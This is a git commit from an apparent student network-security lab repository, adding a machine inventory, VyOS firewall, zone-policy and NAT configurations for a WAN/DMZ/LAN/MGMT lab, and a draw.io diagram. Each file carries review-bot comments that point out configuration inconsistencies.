migrate to git.charlotte.sh

This commit is contained in:
Charlotte Croce 2025-04-19 23:42:08 -04:00
commit fbd588721e
412 changed files with 13750 additions and 0 deletions

View file

@ -0,0 +1,24 @@
# Network Security Controls
| Machine | IP Address | Default Gateway | DNS Server | Network | Description |
|----------|------------|----------------|------------|-----------|----------|
| [fw01](machines/FW01.md) | eth0: 10.0.17.151/24<br>eth1: 172.16.50.2/29<br>eth2: 172.16.150.2/24 | 10.0.17.2 | 10.0.17.2 | WAN/DMZ/LAN | VyOS router for all networks |
| [edge01](machines/EDGE01.md) | eth0: 10.0.17.151/24<br>eth1: 172.16.50.2/29<br>eth2: 172.16.150.2/24 | 10.0.17.2 | 10.0.17.2 | WAN/DMZ/LAN | Assessment VyOS router |
| [fw-mgmt](machines/FW-MGMT.md) | eth0: 172.16.150.3/24<br>eth1: 172.16.200.2/28 | 172.16.150.2 | 172.16.150.2 | LAN/MGMT | VyOS for LAN/MGMT |
| [web01](machines/WEB01.md) | 172.16.50.3/29 | 172.16.50.2 | 172.16.50.2 | DMZ | CentOS Apache server |
| [nginx01](machines/NGINX01.md) | 172.16.50.3/29 | 172.16.50.2 | 172.16.50.2 | DMZ | Ubuntu NGINX server |
| [log01](machines/LOG01.md) | 172.16.50.5/29 | 172.16.50.2 | 172.16.50.2 | DMZ | CentOS log server |
| [jump](machines/LOG01.md#recommissioned-as-jump-server) | 172.16.50.4/29 | 172.16.50.2 | 172.16.50.2 | DMZ | SSH jump host |
| [wazuh](machines/WAZUH.md) | 172.16.200.10/28 | 172.16.200.2 | 172.16.200.2 | MGMT | Wazuh SIEM server |
| [mgmt01](machines/MGMT01.md) | 172.16.150.10/24 | 172.16.150.2 | 172.16.150.2 | LAN | Ubuntu admin station |
| [mgmt02](machines/MGMT02.md) | 172.16.200.11/28 | 172.16.200.2 | 172.16.200.2 | MGMT | Windows admin server |
| [wks01](machines/WKS01.md) | 172.16.150.50/24 | 172.16.150.2 | 172.16.150.2 | LAN | Windows workstation |
| [rw01](machines/RW01.md) | 10.0.17.51/24 | 10.0.17.2 | 10.0.17.2 | WAN | Ubuntu road warrior |
| [traveler](machines/TRAVELER.md) | 10.0.17.51/24 | 10.0.17.2 | 10.0.17.2 | WAN | Windows road warrior |
| [dhcp01](machines/DHCP01.md) | 172.16.150.151/24 | 172.16.150.2 | 172.16.150.2 | LAN | Ubuntu DHCP server |
*Note: fw01 was replaced by edge01, web01 was replaced by nginx01, log01 was repurposed as jump, and rw01 was replaced by traveler*
## Network Diagram - Before Midterm
![Diagram before midterm](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/diagrams/SEC350_network-diagram-beforemidterm.drawio.png?raw=true "Network Diagram")
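Review bot: the `*Note: ...*` line sits directly under the last table row (dhcp01) with no blank line between them, so GFM parses it as one more table row instead of a paragraph; add a blank line before it. The same note says log01 was repurposed as jump, yet the table lists log01 at 172.16.50.5 and jump at 172.16.50.4 while the jump row links to a LOG01.md anchor; state in the jump description whether the host was re-addressed when it was recommissioned so the two rows reconcile. The three replaced/replacement pairs (fw01/edge01, web01/nginx01, rw01/traveler) carry identical addresses, which the note explains, but marking the retired rows as retired in the Description column would make the table self-explanatory.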

View file

@ -0,0 +1,103 @@
set firewall name DMZ-to-LAN default-action 'drop'
set firewall name DMZ-to-LAN enable-default-log
set firewall name DMZ-to-LAN rule 1 action 'accept'
set firewall name DMZ-to-LAN rule 1 state established 'enable'
set firewall name DMZ-to-LAN rule 10 action 'accept'
set firewall name DMZ-to-LAN rule 10 description 'wazuh agent communication with server'
set firewall name DMZ-to-LAN rule 10 destination address '172.16.200.10'
set firewall name DMZ-to-LAN rule 10 destination port '1514,1515'
set firewall name DMZ-to-LAN rule 10 protocol 'tcp'
set firewall name DMZ-to-WAN default-action 'drop'
set firewall name DMZ-to-WAN enable-default-log
set firewall name DMZ-to-WAN rule 1 action 'accept'
set firewall name DMZ-to-WAN rule 1 state established 'enable'
set firewall name DMZ-to-WAN rule 10 action 'accept'
set firewall name DMZ-to-WAN rule 10 description 'NGINX->WAN'
set firewall name DMZ-to-WAN rule 10 source address '172.16.50.3'
set firewall name LAN-to-DMZ default-action 'drop'
set firewall name LAN-to-DMZ enable-default-log
set firewall name LAN-to-DMZ rule 1 action 'accept'
set firewall name LAN-to-DMZ rule 1 state established 'enable'
set firewall name LAN-to-DMZ rule 10 action 'accept'
set firewall name LAN-to-DMZ rule 10 description 'Allow HTTP from LAN to DMZ'
set firewall name LAN-to-DMZ rule 10 destination address '172.16.50.3'
set firewall name LAN-to-DMZ rule 10 destination port '80'
set firewall name LAN-to-DMZ rule 10 protocol 'tcp'
set firewall name LAN-to-DMZ rule 20 action 'accept'
set firewall name LAN-to-DMZ rule 20 description 'Allow SSH from MGMT-01 to DMZ'
set firewall name LAN-to-DMZ rule 20 destination port '22'
set firewall name LAN-to-DMZ rule 20 protocol 'tcp'
set firewall name LAN-to-DMZ rule 20 source address '172.16.150.10'
set firewall name LAN-to-WAN default-action 'drop'
set firewall name LAN-to-WAN enable-default-log
set firewall name LAN-to-WAN rule 1 action 'accept'
set firewall name WAN-to-DMZ default-action 'drop'
set firewall name WAN-to-DMZ enable-default-log
set firewall name WAN-to-DMZ rule 1 action 'accept'
set firewall name WAN-to-DMZ rule 1 state established 'enable'
set firewall name WAN-to-DMZ rule 10 action 'accept'
set firewall name WAN-to-DMZ rule 10 description 'allow HTTP from WAN to DMZ'
set firewall name WAN-to-DMZ rule 10 destination address '172.16.50.3'
set firewall name WAN-to-DMZ rule 10 destination port '80'
set firewall name WAN-to-DMZ rule 10 protocol 'tcp'
set firewall name WAN-to-DMZ rule 20 action 'accept'
set firewall name WAN-to-DMZ rule 20 description 'SSH to JUMP'
set firewall name WAN-to-DMZ rule 20 destination address '172.16.50.4'
set firewall name WAN-to-DMZ rule 20 destination port '22'
set firewall name WAN-to-DMZ rule 20 protocol 'tcp'
set firewall name WAN-to-LAN default-action 'drop'
set firewall name WAN-to-LAN enable-default-log
set firewall name WAN-to-LAN rule 1 action 'accept'
set firewall name WAN-to-LAN rule 1 state established 'enable'
set interfaces ethernet eth0 address '10.0.17.151/24'
set interfaces ethernet eth0 description 'SEC350-WAN'
set interfaces ethernet eth1 address '172.16.50.2/29'
set interfaces ethernet eth1 description 'CHARLOTTE-DMZ'
set interfaces ethernet eth2 address '172.16.150.2/24'
set interfaces ethernet eth2 description 'CHARLOTTE-LAN'
set nat destination rule 10 description 'HTTP->NGINX01'
set nat destination rule 10 destination port '80'
set nat destination rule 10 inbound-interface 'eth0'
set nat destination rule 10 protocol 'tcp'
set nat destination rule 10 translation address '172.16.50.3'
set nat destination rule 20 description 'SSH->JUMP'
set nat destination rule 20 destination port '22'
set nat destination rule 20 inbound-interface 'eth0'
set nat destination rule 20 protocol 'tcp'
set nat destination rule 20 translation address '172.16.50.4'
set nat source rule 10 description 'NAT FROM DMZ to WAN'
set nat source rule 10 outbound-interface 'eth0'
set nat source rule 10 source address '172.16.50.0/29'
set nat source rule 10 translation address 'masquerade'
set nat source rule 20 description 'NAT FROM LAN to WAN'
set nat source rule 20 outbound-interface 'eth0'
set nat source rule 20 source address '172.16.150.0/24'
set nat source rule 20 translation address 'masquerade'
set nat source rule 30 description 'NAT FROM MGMT to WAN'
set nat source rule 30 outbound-interface 'eth0'
set nat source rule 30 source address '172.16.200.0/28'
set nat source rule 30 translation address 'masquerade'
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set service dhcp-relay interface 'eth0'
set service dhcp-relay interface 'eth2'
set service dhcp-relay server '172.16.150.151'
set service dns forwarding allow-from '172.16.150.0/24'
set service dns forwarding allow-from '172.16.50.0/29'
set service dns forwarding listen-address '172.16.150.2'
set service dns forwarding listen-address '172.16.50.2'
set service dns forwarding system
set service ssh listen-address '0.0.0.0'
set service ssh listen-address '172.16.150.2'
set system host-name 'edge02-charlotte'
set system name-server '10.0.17.2'
set zone-policy zone DMZ from LAN firewall name 'LAN-to-DMZ'
set zone-policy zone DMZ from WAN firewall name 'WAN-to-DMZ'
set zone-policy zone DMZ interface 'eth1'
set zone-policy zone LAN from DMZ firewall name 'DMZ-to-LAN'
set zone-policy zone LAN from WAN firewall name 'WAN-to-LAN'
set zone-policy zone LAN interface 'eth2'
set zone-policy zone WAN from DMZ firewall name 'DMZ-to-WAN'
set zone-policy zone WAN from LAN firewall name 'LAN-to-WAN'
set zone-policy zone WAN interface 'eth0'
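Review bot: `set system host-name 'edge02-charlotte'` does not match the `edge01` name used in the README table; one of the two should change. In the `service ssh` block, `listen-address '0.0.0.0'` makes the following `listen-address '172.16.150.2'` redundant and binds management SSH on eth0 (WAN) as well; keep only the LAN address (with `nat destination rule 20` forwarding every TCP/22 arriving on eth0 to 172.16.50.4, the WAN listener is unreachable anyway). `set service dhcp-relay interface 'eth0'` relays DHCP from the 10.0.17.0/24 WAN segment to 172.16.150.151, which LAN clients do not need because dhcp01 is on-link via eth2; confirm that the road-warrior hosts are meant to take leases from dhcp01, otherwise drop eth0 from the relay. Two style points across the rulesets: every `rule 1 state established 'enable'` lacks `state related 'enable'`, so ICMP errors tied to accepted flows fall through to the logged default drop; and `LAN-to-WAN rule 1 action 'accept'` with no match criteria is an unconditional allow, which deserves a `description` saying so.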

View file

@ -0,0 +1,13 @@
set interfaces ethernet eth0 address '172.16.150.3/24'
set interfaces ethernet eth0 description 'LAN'
set interfaces ethernet eth1 address '172.16.200.2/28'
set interfaces ethernet eth1 description 'MGMT'
set protocols rip interface eth0
set protocols rip network '172.16.200.0/28'
set protocols static route 0.0.0.0/0 next-hop 172.16.150.2
set service dns forwarding allow-from '172.16.200.0/28'
set service dns forwarding listen-address '172.16.200.2'
set service dns forwarding system
set service ssh listen-address '0.0.0.0'
set system host-name 'fw-mgmt-charlotte'
set system name-server '172.16.150.2'
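Review bot: this fw-mgmt configuration has no `firewall name` or `zone-policy` stanzas, so traffic is forwarded freely in both directions between eth0 (LAN) and eth1 (MGMT); if this file is the pre-firewall snapshot that the zoned fw-mgmt file in the same commit supersedes, record that in the README, otherwise the management network is unfiltered. `set service ssh listen-address '0.0.0.0'` should be narrowed to the MGMT address 172.16.200.2 so the router is administered only from the management network.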

View file

@ -0,0 +1,49 @@
set firewall name LAN-to-MGMT default-action 'drop'
set firewall name LAN-to-MGMT enable-default-log
set firewall name LAN-to-MGMT rule 1 action 'accept'
set firewall name LAN-to-MGMT rule 1 state established 'enable'
set firewall name LAN-to-MGMT rule 10 action 'accept'
set firewall name LAN-to-MGMT rule 10 description 'wazuh SSH access from MGMT-01'
set firewall name LAN-to-MGMT rule 10 destination address '172.16.200.10'
set firewall name LAN-to-MGMT rule 10 destination port '22'
set firewall name LAN-to-MGMT rule 10 protocol 'tcp'
set firewall name LAN-to-MGMT rule 10 source address '172.16.150.10'
set firewall name LAN-to-MGMT rule 20 action 'accept'
set firewall name LAN-to-MGMT rule 20 description 'wazuh HTTPS access from MGMT-01'
set firewall name LAN-to-MGMT rule 20 destination address '172.16.200.10'
set firewall name LAN-to-MGMT rule 20 destination port '443'
set firewall name LAN-to-MGMT rule 20 protocol 'tcp'
set firewall name LAN-to-MGMT rule 20 source address '172.16.150.10'
set firewall name LAN-to-MGMT rule 30 action 'accept'
set firewall name LAN-to-MGMT rule 30 description 'wazuh agent communication with server'
set firewall name LAN-to-MGMT rule 30 destination address '172.16.200.10'
set firewall name LAN-to-MGMT rule 30 destination port '1514,1515'
set firewall name LAN-to-MGMT rule 30 protocol 'tcp'
set firewall name MGMT-to-LAN default-action 'drop'
set firewall name MGMT-to-LAN enable-default-log
set firewall name MGMT-to-LAN rule 1 action 'accept'
set firewall name MGMT-to-LAN rule 1 state established 'enable'
set firewall name MGMT-to-LAN rule 10 action 'accept'
set firewall name MGMT-to-LAN rule 10 description 'allows MGMT to LAN'
set firewall name MGMT-to-LAN rule 10 destination address '172.16.150.0/24'
set firewall name MGMT-to-LAN rule 20 action 'accept'
set firewall name MGMT-to-LAN rule 20 description 'allows MGMT to DMZ'
set firewall name MGMT-to-LAN rule 20 destination address '172.16.50.0/29'
set interfaces ethernet eth0 address '172.16.150.3/24'
set interfaces ethernet eth0 description 'LAN'
set interfaces ethernet eth1 address '172.16.200.2/28'
set interfaces ethernet eth1 description 'MGMT'
set nat source
set protocols rip interface eth0
set protocols rip network '172.16.200.0/28'
set protocols static route 0.0.0.0/0 next-hop 172.16.150.2
set service dns forwarding allow-from '172.16.200.0/28'
set service dns forwarding listen-address '172.16.200.2'
set service dns forwarding system
set service ssh listen-address '0.0.0.0'
set system host-name 'fw-mgmt-charlotte'
set system name-server '172.16.150.2'
set zone-policy zone LAN from MGMT firewall name 'MGMT-to-LAN'
set zone-policy zone LAN interface 'eth0'
set zone-policy zone MGMT from LAN firewall name 'LAN-to-MGMT'
set zone-policy zone MGMT interface 'eth1'
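Review bot: `set nat source` near the end of the file is a bare node with no rule beneath it, most likely an editing leftover; remove it so the file loads cleanly. The larger issue is in `MGMT-to-LAN`: rule 10 accepts only destinations in 172.16.150.0/24 and rule 20 only 172.16.50.0/29, so new connections from MGMT hosts (wazuh, mgmt02) toward the WAN hit `default-action 'drop'`, even though the edge router carries `nat source rule 30` for exactly that traffic; either add an accept for WAN-bound flows or note that MGMT egress is intentionally blocked. As in the edge01 file, `rule 1 state established 'enable'` in both rulesets lacks `state related 'enable'`.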

View file

@ -0,0 +1,29 @@
set interfaces ethernet eth0 address '10.0.17.151/24'
set interfaces ethernet eth0 description 'SEC350-WAN'
set interfaces ethernet eth1 address '172.16.50.2/29'
set interfaces ethernet eth1 description 'CHARLOTTE-DMZ'
set interfaces ethernet eth2 address '172.16.150.2/24'
set interfaces ethernet eth2 description 'CHARLOTTE-LAN'
set nat source rule 10 description 'NAT FROM DMZ to WAN'
set nat source rule 10 outbound-interface 'eth0'
set nat source rule 10 source address '172.16.50.0/29'
set nat source rule 10 translation address 'masquerade'
set nat source rule 20 description 'NAT from LAN to WAN'
set nat source rule 20 outbound-interface 'eth0'
set nat source rule 20 source address '172.16.150.0/24'
set nat source rule 20 translation address 'masquerade'
set nat source rule 30 description 'NAT from MGMT to LAN'
set nat source rule 30 outbound-interface 'eth0'
set nat source rule 30 source address '172.16.200.0/28'
set nat source rule 30 translation address 'masquerade'
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set service dns forwarding allow-from '172.16.50.0/29'
set service dns forwarding allow-from '172.16.150.0/24'
set service dns forwarding listen-address '172.16.50.2'
set service dns forwarding listen-address '172.16.150.2'
set service dns forwarding system
set service ssh listen-address '0.0.0.0'
set system host-name 'fw01-charlotte'
set system name-server '10.0.17.2'
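Review bot: `set nat source rule 30 description 'NAT from MGMT to LAN'` contradicts the rule it labels, which masquerades 172.16.200.0/28 on `outbound-interface 'eth0'` (the WAN side); it should read 'NAT from MGMT to WAN' to match rules 10 and 20. This fw01 snapshot also has no firewall or zone-policy stanzas, so all three networks are routed without filtering, and `ssh listen-address '0.0.0.0'` exposes management SSH on the WAN interface; narrow it to the LAN address 172.16.150.2.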

View file

@ -0,0 +1,79 @@
set firewall name DMZ-to-LAN default-action 'drop'
set firewall name DMZ-to-LAN enable-default-log
set firewall name DMZ-to-LAN rule 1 action 'accept'
set firewall name DMZ-to-LAN rule 1 state established 'enable'
set firewall name DMZ-to-LAN rule 10 action 'accept'
set firewall name DMZ-to-LAN rule 10 description 'wazuh agent communication with server'
set firewall name DMZ-to-LAN rule 10 destination address '172.16.200.10'
set firewall name DMZ-to-LAN rule 10 destination port '1514,1515'
set firewall name DMZ-to-LAN rule 10 protocol 'tcp'
set firewall name DMZ-to-WAN default-action 'drop'
set firewall name DMZ-to-WAN enable-default-log
set firewall name DMZ-to-WAN rule 1 action 'accept'
set firewall name DMZ-to-WAN rule 1 state established 'enable'
set firewall name LAN-to-DMZ default-action 'drop'
set firewall name LAN-to-DMZ enable-default-log
set firewall name LAN-to-DMZ rule 1 action 'accept'
set firewall name LAN-to-DMZ rule 1 state established 'enable'
set firewall name LAN-to-DMZ rule 10 action 'accept'
set firewall name LAN-to-DMZ rule 10 description 'Allow HTTP from LAN to DMZ'
set firewall name LAN-to-DMZ rule 10 destination address '172.16.50.3'
set firewall name LAN-to-DMZ rule 10 destination port '80'
set firewall name LAN-to-DMZ rule 10 protocol 'tcp'
set firewall name LAN-to-DMZ rule 20 action 'accept'
set firewall name LAN-to-DMZ rule 20 description 'Allow SSH from MGMT-01 to DMZ'
set firewall name LAN-to-DMZ rule 20 destination port '22'
set firewall name LAN-to-DMZ rule 20 protocol 'tcp'
set firewall name LAN-to-DMZ rule 20 source address '172.16.150.10'
set firewall name LAN-to-WAN default-action 'drop'
set firewall name LAN-to-WAN enable-default-log
set firewall name LAN-to-WAN rule 1 action 'accept'
set firewall name WAN-to-DMZ default-action 'drop'
set firewall name WAN-to-DMZ enable-default-log
set firewall name WAN-to-DMZ rule 10 action 'accept'
set firewall name WAN-to-DMZ rule 10 description 'allow HTTP from WAN to DMZ'
set firewall name WAN-to-DMZ rule 10 destination address '172.16.50.3'
set firewall name WAN-to-DMZ rule 10 destination port '80'
set firewall name WAN-to-DMZ rule 10 protocol 'tcp'
set firewall name WAN-to-LAN default-action 'drop'
set firewall name WAN-to-LAN enable-default-log
set firewall name WAN-to-LAN rule 1 action 'accept'
set firewall name WAN-to-LAN rule 1 state established 'enable'
set interfaces ethernet eth0 address '10.0.17.151/24'
set interfaces ethernet eth0 description 'SEC350-WAN'
set interfaces ethernet eth1 address '172.16.50.2/29'
set interfaces ethernet eth1 description 'CHARLOTTE-DMZ'
set interfaces ethernet eth2 address '172.16.150.2/24'
set interfaces ethernet eth2 description 'CHARLOTTE-LAN'
set nat source rule 10 description 'NAT FROM DMZ to WAN'
set nat source rule 10 outbound-interface 'eth0'
set nat source rule 10 source address '172.16.50.0/29'
set nat source rule 10 translation address 'masquerade'
set nat source rule 20 description 'NAT from LAN to WAN'
set nat source rule 20 outbound-interface 'eth0'
set nat source rule 20 source address '172.16.150.0/24'
set nat source rule 20 translation address 'masquerade'
set nat source rule 30 description 'NAT from MGMT to LAN'
set nat source rule 30 outbound-interface 'eth0'
set nat source rule 30 source address '172.16.200.0/28'
set nat source rule 30 translation address 'masquerade'
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set service dns forwarding allow-from '172.16.50.0/29'
set service dns forwarding allow-from '172.16.150.0/24'
set service dns forwarding listen-address '172.16.50.2'
set service dns forwarding listen-address '172.16.150.2'
set service dns forwarding system
set service ssh listen-address '0.0.0.0'
set system host-name 'fw01-charlotte'
set system name-server '10.0.17.2'
set zone-policy zone DMZ from LAN firewall name 'LAN-to-DMZ'
set zone-policy zone DMZ from WAN firewall name 'WAN-to-DMZ'
set zone-policy zone DMZ interface 'eth1'
set zone-policy zone LAN from DMZ firewall name 'DMZ-to-LAN'
set zone-policy zone LAN from WAN firewall name 'WAN-to-LAN'
set zone-policy zone LAN interface 'eth2'
set zone-policy zone WAN from DMZ firewall name 'DMZ-to-WAN'
set zone-policy zone WAN from LAN firewall name 'LAN-to-WAN'
set zone-policy zone WAN interface 'eth0'
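Review bot: `WAN-to-DMZ` has no `rule 1 state established 'enable'` (it begins at rule 10), so reply packets for any connection a DMZ host opens toward the WAN are dropped, and `DMZ-to-WAN` contains only the established rule with no accept for new flows, so DMZ hosts cannot reach the WAN at all while `nat source rule 10` masquerades 172.16.50.0/29 out eth0 for nothing; add an outbound accept for the DMZ (the edge01 file's `DMZ-to-WAN rule 10` 'NGINX->WAN' is the model) together with the return-direction established rule, or drop the unused NAT rule. The `nat source rule 30 description 'NAT from MGMT to LAN'` mismatch from the earlier fw01 file is carried over here and should say WAN.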

View file

@ -0,0 +1,81 @@
set firewall name DMZ-to-LAN default-action 'drop'
set firewall name DMZ-to-LAN enable-default-log
set firewall name DMZ-to-LAN rule 1 action 'accept'
set firewall name DMZ-to-LAN rule 1 state established 'enable'
set firewall name DMZ-to-LAN rule 10 action 'accept'
set firewall name DMZ-to-LAN rule 10 description 'wazuh agent communication with server'
set firewall name DMZ-to-LAN rule 10 destination address '172.16.200.10'
set firewall name DMZ-to-LAN rule 10 destination port '1514,1515'
set firewall name DMZ-to-LAN rule 10 protocol 'tcp'
set firewall name DMZ-to-WAN default-action 'drop'
set firewall name DMZ-to-WAN enable-default-log
set firewall name DMZ-to-WAN rule 1 action 'accept'
set firewall name DMZ-to-WAN rule 1 state established 'enable'
set firewall name LAN-to-DMZ default-action 'drop'
set firewall name LAN-to-DMZ enable-default-log
set firewall name LAN-to-DMZ rule 1 action 'accept'
set firewall name LAN-to-DMZ rule 1 state established 'enable'
set firewall name LAN-to-DMZ rule 10 action 'accept'
set firewall name LAN-to-DMZ rule 10 description 'Allow HTTP from LAN to DMZ'
set firewall name LAN-to-DMZ rule 10 destination address '172.16.50.3'
set firewall name LAN-to-DMZ rule 10 destination port '80'
set firewall name LAN-to-DMZ rule 10 protocol 'tcp'
set firewall name LAN-to-DMZ rule 20 action 'accept'
set firewall name LAN-to-DMZ rule 20 description 'Allow SSH from MGMT-01 to DMZ'
set firewall name LAN-to-DMZ rule 20 destination port '22'
set firewall name LAN-to-DMZ rule 20 protocol 'tcp'
set firewall name LAN-to-DMZ rule 20 source address '172.16.150.10'
set firewall name LAN-to-WAN default-action 'drop'
set firewall name LAN-to-WAN enable-default-log
set firewall name LAN-to-WAN rule 1 action 'accept'
set firewall name WAN-to-DMZ default-action 'drop'
set firewall name WAN-to-DMZ enable-default-log
set firewall name WAN-to-DMZ rule 1 action 'accept'
set firewall name WAN-to-DMZ rule 1 state established 'enable'
set firewall name WAN-to-DMZ rule 10 action 'accept'
set firewall name WAN-to-DMZ rule 10 description 'allow HTTP from WAN to DMZ'
set firewall name WAN-to-DMZ rule 10 destination address '172.16.50.3'
set firewall name WAN-to-DMZ rule 10 destination port '80'
set firewall name WAN-to-DMZ rule 10 protocol 'tcp'
set firewall name WAN-to-LAN default-action 'drop'
set firewall name WAN-to-LAN enable-default-log
set firewall name WAN-to-LAN rule 1 action 'accept'
set firewall name WAN-to-LAN rule 1 state established 'enable'
set interfaces ethernet eth0 address '10.0.17.151/24'
set interfaces ethernet eth0 description 'SEC350-WAN'
set interfaces ethernet eth1 address '172.16.50.2/29'
set interfaces ethernet eth1 description 'CHARLOTTE-DMZ'
set interfaces ethernet eth2 address '172.16.150.2/24'
set interfaces ethernet eth2 description 'CHARLOTTE-LAN'
set nat source rule 10 description 'NAT FROM DMZ to WAN'
set nat source rule 10 outbound-interface 'eth0'
set nat source rule 10 source address '172.16.50.0/29'
set nat source rule 10 translation address 'masquerade'
set nat source rule 20 description 'NAT from LAN to WAN'
set nat source rule 20 outbound-interface 'eth0'
set nat source rule 20 source address '172.16.150.0/24'
set nat source rule 20 translation address 'masquerade'
set nat source rule 30 description 'NAT from MGMT to LAN'
set nat source rule 30 outbound-interface 'eth0'
set nat source rule 30 source address '172.16.200.0/28'
set nat source rule 30 translation address 'masquerade'
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set service dns forwarding allow-from '172.16.50.0/29'
set service dns forwarding allow-from '172.16.150.0/24'
set service dns forwarding listen-address '172.16.50.2'
set service dns forwarding listen-address '172.16.150.2'
set service dns forwarding system
set service ssh listen-address '0.0.0.0'
set system host-name 'fw01-charlotte'
set system name-server '10.0.17.2'
set zone-policy zone DMZ from LAN firewall name 'LAN-to-DMZ'
set zone-policy zone DMZ from WAN firewall name 'WAN-to-DMZ'
set zone-policy zone DMZ interface 'eth1'
set zone-policy zone LAN from DMZ firewall name 'DMZ-to-LAN'
set zone-policy zone LAN from WAN firewall name 'WAN-to-LAN'
set zone-policy zone LAN interface 'eth2'
set zone-policy zone WAN from DMZ firewall name 'DMZ-to-WAN'
set zone-policy zone WAN from LAN firewall name 'LAN-to-WAN'
set zone-policy zone WAN interface 'eth0'
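Review bot: `DMZ-to-WAN` still holds only rule 1 (established), so DMZ hosts cannot open new connections to the WAN and `nat source rule 10` for 172.16.50.0/29 never matches, even though `WAN-to-DMZ rule 1 state established 'enable'` now covers the return direction; add an accept for DMZ-originated traffic (the edge01 file's 'NGINX->WAN' rule 10) or note that DMZ egress is intentionally blocked. `nat source rule 30 description 'NAT from MGMT to LAN'` should read WAN, consistent with rules 10 and 20 and with the rule's `outbound-interface 'eth0'`, and `ssh listen-address '0.0.0.0'` should be narrowed to the LAN address 172.16.150.2.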

View file

@ -0,0 +1,297 @@
<mxfile host="app.diagrams.net" agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" version="26.1.1">
<diagram name="Page-1" id="OsbpnMVMir5d5On4mEyH">
<mxGraphModel dx="1615" dy="878" grid="1" gridSize="10" guides="1" tooltips="1" connect="1" arrows="1" fold="1" page="1" pageScale="1" pageWidth="850" pageHeight="1100" math="0" shadow="0">
<root>
<mxCell id="0" />
<mxCell id="1" parent="0" />
<mxCell id="r5Bo3zyKJavz-clfbByA-1" value="SEC-350 WAN 10.0.17.0/24" style="rounded=1;whiteSpace=wrap;html=1;align=center;" vertex="1" parent="1">
<mxGeometry x="560" y="380" width="340" height="40" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-2" value="LAN 172.16.150.0/24" style="rounded=1;whiteSpace=wrap;html=1;align=center;" vertex="1" parent="1">
<mxGeometry x="770" y="620" width="340" height="40" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-3" value="DMZ 172.16.50.0/29" style="rounded=1;whiteSpace=wrap;html=1;align=center;" vertex="1" parent="1">
<mxGeometry x="160" y="610" width="340" height="40" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-4" value="EDGE01" style="outlineConnect=0;dashed=0;verticalLabelPosition=bottom;verticalAlign=top;align=center;html=1;shape=mxgraph.aws3.router;fillColor=#F58534;gradientColor=none;" vertex="1" parent="1">
<mxGeometry x="610" y="502.6" width="69" height="72" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-5" value="" style="endArrow=none;html=1;rounded=0;entryX=0.855;entryY=0.855;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.104;exitY=0;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-2" target="r5Bo3zyKJavz-clfbByA-4">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="921" y="710" as="sourcePoint" />
<mxPoint x="971" y="660" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-6" value="172.16.150.2&lt;div&gt;eth2&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];rotation=0;" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-5">
<mxGeometry x="0.002" y="2" relative="1" as="geometry">
<mxPoint x="-6" y="-14" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-7" value="" style="endArrow=none;html=1;rounded=0;entryX=0.145;entryY=0.855;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.829;exitY=-0.05;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-3" target="r5Bo3zyKJavz-clfbByA-4">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="491" y="560" as="sourcePoint" />
<mxPoint x="541" y="510" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-8" value="172.16.50.2&lt;div&gt;eth1&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];rotation=0;" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-7">
<mxGeometry x="0.4" y="-1" relative="1" as="geometry">
<mxPoint x="-17" y="6" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-9" value="LOG01 (DECOMMISSIONED,&amp;nbsp;&lt;div&gt;THEN RECOMMISSIONED AS A&amp;nbsp;&lt;/div&gt;&lt;div&gt;JUMP SERVER)&lt;br&gt;&lt;div&gt;172.16.50.5&lt;/div&gt;&lt;/div&gt;" style="outlineConnect=0;dashed=0;verticalLabelPosition=bottom;verticalAlign=top;align=center;html=1;shape=mxgraph.aws3.traditional_server;fillColor=#7D7C7C;gradientColor=none;" vertex="1" parent="1">
<mxGeometry x="407" y="693" width="35.5" height="53" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-10" value="" style="endArrow=none;html=1;rounded=0;exitX=0.153;exitY=0.975;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-3">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="481" y="850" as="sourcePoint" />
<mxPoint x="210" y="690" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-11" value="" style="endArrow=none;html=1;rounded=0;entryX=0.5;entryY=0;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.432;exitY=1.047;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-1" target="r5Bo3zyKJavz-clfbByA-4">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="805" y="530" as="sourcePoint" />
<mxPoint x="855" y="480" as="targetPoint" />
</mxGeometry>
